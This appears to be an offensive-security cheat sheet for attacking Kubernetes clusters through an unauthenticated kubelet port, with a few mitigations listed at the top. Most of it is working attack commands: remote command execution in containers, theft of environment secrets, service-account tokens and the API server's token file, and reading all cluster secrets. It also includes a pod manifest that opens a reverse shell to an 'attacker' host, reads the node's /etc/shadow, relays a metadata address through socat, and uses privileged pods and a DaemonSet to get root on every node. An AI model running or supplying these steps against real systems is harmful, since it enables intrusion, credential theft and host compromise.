Kubelet Exploit

  • Anyone who can reach the kubelet port (10250), even without a certificate, can execute commands inside any container running on that node
  • Mitigations:
    • Run the kubelet with --anonymous-auth=false (a quick check is shown after this list)
    • Segregate the kubelet at the network level, or force it to listen on localhost only (--address=127.0.0.1)
    • Force kube-apiserver to reach the kubelets over SSH instead of HTTPS (--ssh-keyfile=path/to/id_rsa, --ssh-user=kube)
    • Give every Service Account the least privileges needed for its tasks
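
With --anonymous-auth=false in place, the same unauthenticated request should be rejected with a 401 instead of returning the pod list (a quick sanity check, not part of the original notes):

    $ curl -sk -o /dev/null -w '%{http_code}\n' https://WORKER:10250/pods/
    401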

Test Command Execution

List of all pods and containers scheduled

$ curl -sk https://WORKER:10250/pods/ | python -mjson.tool
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "tiller-797d1b1234-gb6qt",       <-- PODNAME
        "generateName": "tiller-797d1b1234-",
        "namespace": "kube-system",              <-- NAMESPACE
      ...
      "spec": {
        "containers": [
          {
            "name": "tiller",                     <-- CONTAINERNAME
            "image": "x/tiller:2.5.1",
            "ports": [
              {
                "name": "tiller",
                "containerPort": 44134,
                "protocol": "TCP"
              }
            ],
        "serviceAccountName": "tiller",
        "serviceAccount": "tiller",
    ...
    },
    ...
  ]
}
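
If jq is installed, the namespace/pod/container triples needed by the endpoints below can be pulled out directly (a convenience one-liner, not part of the original notes):

    $ curl -sk https://WORKER:10250/pods/ \
      | jq -r '.items[] | "\(.metadata.namespace) \(.metadata.name) \(.spec.containers[].name)"'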

Run command (python)

  • Install kubelet-anon-rce:

    $ git clone https://github.com/serain/kubelet-anon-rce.git
    $ cd kubelet-anon-rce
    $ PIPENV_VENV_IN_PROJECT=true pipenv --python /usr/bin/python3 install --skip-lock
    $ pipenv shell
    

  • Start stream with curl:

    $ curl -Gks https://worker:10250/exec/{namespace}/{podname}/{containername} \
      -d 'input=1' -d 'output=1' -d 'tty=1'                                     \
      -d 'command=ls' -d 'command=/'
    
    $ curl -Gks https://worker:10250/exec/kube-system/tiller-797d1b1234-gb6qt/tiller \
      -d 'input=1' -d 'output=1' -d 'tty=1'                                          \
      -d 'command=ls' -d 'command=/'
    

  • Open with kubelet-anon-rce:

    $ python3 kubelet-anon-rce.py           \
              --node <WORKER>               \
              --namespace <NAMESPACE>       \
              --pod <PODNAME>               \
              --container <CONTAINERNAME>   \
              --exec "ls /"
    
    $ python3 kubelet-anon-rce.py           \
              --node worker                 \
              --namespace kube-system       \
              --pod tiller-797d1b1234-gb6qt \
              --container tiller            \
              --exec "ls /"
    

Run command (wscat)

  • Install wscat:

    $ apt-get update
    $ apt-get install -y npm
    $ ln -s /usr/bin/nodejs /usr/bin/node
    $ npm install -g n
    $ n stable
    $ npm install -g wscat
    

  • Start stream with curl:

    $ curl --insecure -v \
          -H "X-Stream-Protocol-Version: v2.channel.k8s.io" \
          -H "X-Stream-Protocol-Version: channel.k8s.io" \
          -X POST "https://WORKER:10250/exec/<namespace>/<podname>/<container-name>?input=1&output=1&tty=1&command=ls"
    
    # That should return a 302 response with a redirect to a stream you can open
    < HTTP/2 302
    < location: /cri/exec/PfWkLulG
    < content-type: text/plain; charset=utf-8
    < content-length: 0
    < date: Tue, 13 Mar 2018 19:21:00 GMT
    

  • Open stream with wscat:

    $ wscat -c "https://kube-node-here:10250/cri/exec/PfWkLulG" --no-check
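
The two steps can also be glued together by scraping the Location header out of the 302 (a convenience sketch; header casing may vary by container runtime):

    $ STREAM=$(curl -ksi -X POST \
        "https://WORKER:10250/exec/<namespace>/<podname>/<containername>?input=1&output=1&tty=1&command=ls" \
        | awk 'tolower($1) == "location:" {print $2}' | tr -d '\r')
    $ wscat -c "https://WORKER:10250${STREAM}" --no-check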
    

Get access to the API server

Dump secrets from environment variables

$ curl -k -XPOST "https://WORKER:10250/run/<NAMESPACE>/<PODNAME>/<CONTAINERNAME>" -d "cmd=env"
$ curl -k -XPOST "https://WORKER:10250/run/kube-system/node-exporter-iuwg7/node-exporter" -d "cmd=env"

Obtain ServiceAccount Token

The token for the "tiller" Service Account can be retrieved by using the kubelet API /exec endpoint to print it out:

$ python3 kubelet-anon-rce.py           \
          --node <WORKER>               \
          --namespace <NAMESPACE>       \
          --pod <PODNAME>               \
          --container <CONTAINERNAME>   \
          --exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token"

$ python3 kubelet-anon-rce.py           \
          --node worker                 \
          --namespace kube-system       \
          --pod tiller-797d1b1234-gb6qt \
          --container tiller            \
          --exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token"

Or, if the token is not in the default location:

  • List the processes running in the kube-apiserver container to find the path of the token file the API server uses to authenticate access to the API:

    $ curl -k -XPOST "https://WORKER:10250/run/kube-system/kube-apiserver-kube/kube-apiserver" -d "cmd=ps -ef"
    
    PID   USER     TIME   COMMAND
        1 root       2:29 /usr/local/bin/kube-apiserver --v=4 --insecure-bind-address=127.0.0.1 --etcd-servers=http://127.0.0.1:2379 --admission-control=... --tls-cert-file=/etc/kubernetes/pki/apiserver.pem --tls-private-key-file=/etc/kubernetes/pki/apiserver-key.pem --token-auth-file=/etc/kubernetes/pki/tokens.csv --secure-port=443 --allow-privileged --etcd-servers=http://127.0.0.1:2379
    

  • Cat that file; the token is the first field of each line:

    $ curl -k -XPOST "https://WORKER:10250/run/kube-system/kube-apiserver-kube/kube-apiserver" -d "cmd=cat /etc/kubernetes/pki/tokens.csv"
    
    # token, user, uid, "group1,group2,group3"
    d65ba5f070e714ab,kubeadm-node-csr,9738242e-8681-11e6-b5b4-000c29d33879,system:kubelet-bootstrap
    

Auth to the API server and access all secrets

  • Using kubectl:

    $ kubectl --insecure-skip-tls-verify=true  \
              --server="https://master:6443"   \
              --token="<TOKEN>"                \
              get secrets --all-namespaces -o json
    

  • Using curl:

    $ curl -ks -H "Authorization: Bearer <TOKEN>" \
      https://master:6443/api/v1/namespaces/{namespace}/secrets
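
With jq ≥ 1.6 available, the base64-encoded secret values can be decoded inline (a convenience sketch, not in the original notes):

    $ curl -ks -H "Authorization: Bearer <TOKEN>" \
        https://master:6443/api/v1/namespaces/{namespace}/secrets \
      | jq -r '.items[] | .metadata.name as $n | (.data // {}) | to_entries[] | "\($n)/\(.key): \(.value | @base64d)"'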
    

Access the nodes

Persist with kubectl

  • Persist with kubectl by downloading it and pointing it at the cluster:
    $ wget https://storage.googleapis.com/kubernetes-release/release/v1.4.0/bin/linux/amd64/kubectl
    $ chmod +x kubectl
    $ ./kubectl config set-cluster test --server=https://MASTER
    $ ./kubectl config set-credentials cluster-admin --token=<TOKEN>
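
    The kubeconfig still needs a context tying those credentials to the cluster (standard kubectl config steps; the context name here is arbitrary):

    $ ./kubectl config set-context test --cluster=test --user=cluster-admin
    $ ./kubectl config use-context test
    $ ./kubectl get pods --all-namespaces --insecure-skip-tls-verify=true   # verify access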
    

Create deployment to mount a node's filesystem

  • Access to an underlying node's filesystem can be obtained by mounting the node's root directory into a container deployed in a pod
  • The following pod manifest (node-access.yaml) mounts the host node's filesystem at /host in a container that spawns a reverse shell back to an attacker (start the listener shown after the manifest first)
    apiVersion: v1
    kind: Pod
    metadata:
      name: test
    spec:
      containers:
        - name: busybox
          image: busybox:1.29.2
          command: ["/bin/sh"]
          args: ["-c", "nc attacker 4444 -e /bin/sh"]
          volumeMounts:
          - name: host
            mountPath: /host
      volumes:
        - name: host
          hostPath:
            # directory location on host
            path: /
            type: Directory
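
Before creating the pod, start a listener on the attacker host (assuming the hostname attacker, as used in the manifest above, resolves from inside the cluster):

$ nc -lvnp 4444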
    

Deploy

$ kubectl --insecure-skip-tls-verify=true  \
          --server="https://master:6443"   \
          --token="<TOKEN>"                \
          create -f node-access.yaml

Run commands

  • In addition to the reverse shell, you can also run commands directly in the container
  • For example, cat out the /etc/shadow file of the underlying node via the /host mount:
    $ ./kubectl exec test -c busybox -- cat /host/etc/shadow
    
  • From there, a bit of password cracking yields shell access to the underlying node

Particular Scheduling

Schedule on Master node

apiVersion: v1
kind: Pod
metadata:
  name: socat
spec:
  tolerations:
    - key: "node-role.kubernetes.io/master"
      effect: NoSchedule
  nodeSelector:
    node-role.kubernetes.io/master: ""
  containers:
    - name: socat
      image: alpine/socat
      args: ["tcp4-listen:80,fork,reuseaddr", "tcp4:169.254.169.254:80"]

Get root on host (random node)

  • The following YAML demonstrates the risk of allowing users to create pods on a cluster without a PodSecurityPolicy configured
  • It creates a privileged container from the busybox image, leaves it idling in an endless sleep loop so it can be exec'd into, sets the security flags needed to make the pod privileged, and mounts the root directory of the underlying host at /host
    apiVersion: v1
    kind: Pod
    metadata:
      name: noderootpod
    spec:
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
        - name: noderootpod
          image: busybox
          securityContext:
            privileged: true
          volumeMounts:
            - mountPath: /host
              name: noderoot
          command: [ "/bin/sh", "-c", "--" ]
          args: [ "while true; do sleep 30; done;" ]
      volumes:
        - name: noderoot
          hostPath:
            path: /
    
  • Schedule & get shell:
    kubectl create -f noderoot.yml
    kubectl exec -it noderootpod -- chroot /host
    

Get root on all nodes

  • To get a root shell on every node, use a DaemonSet, which schedules a pod onto each node in the cluster

    apiVersion: apps/v1
    kind: DaemonSet
    metadata:
      name: noderootpod
    spec:
      selector:
        matchLabels:
          name: noderootdaemon
      template:
        metadata:
          labels:
            name: noderootdaemon
        spec:
          tolerations:
          - key: node-role.kubernetes.io/master
            effect: NoSchedule
          hostNetwork: true
          hostPID: true
          hostIPC: true
          containers:
          - name: noderootpod
            image: busybox
            securityContext:
              privileged: true
            volumeMounts:
            - mountPath: /host
              name: noderoot
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "while true; do sleep 30; done;" ]
          volumes:
          - name: noderoot
            hostPath:
              path: /
    

  • Once that's running, kubectl get po lists the pods to choose from

  • Run the same chroot /host command via kubectl exec on any of them to get root on that node
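
For example, selecting the pods by the label set in the manifest above:

$ kubectl get po -l name=noderootdaemon -o wide
$ kubectl exec -it <pod-name> -- chroot /host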